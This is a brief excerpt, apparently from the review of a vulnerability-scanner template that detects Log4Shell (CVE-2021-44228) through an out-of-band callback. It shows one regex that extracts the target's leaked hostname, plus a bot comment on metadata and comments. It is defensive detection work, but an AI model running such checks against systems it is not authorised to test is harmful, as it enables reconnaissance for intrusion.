- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
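Review bot: The description attributes the issue to CVE-2021-44228, but the template has no `classification:` block, so `cve-id` is not machine-readable the way it is in the `cves/` templates added here; adding `classification:` with `cve-id: CVE-2021-44228` (vector, score and CWE from the advisory, as `<value from VMSA-2021-0028>` placeholders until filled) lets the finding correlate with other log4j checks. The regex `'([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'` is duplicated between the matcher and the extractor with two different trailing comments; a single comment explaining that group 1 captures the `${hostName}` value the callback embedded is enough, e.g. `# group 1 = ${hostName} resolved by the target and prefixed to the interactsh domain`.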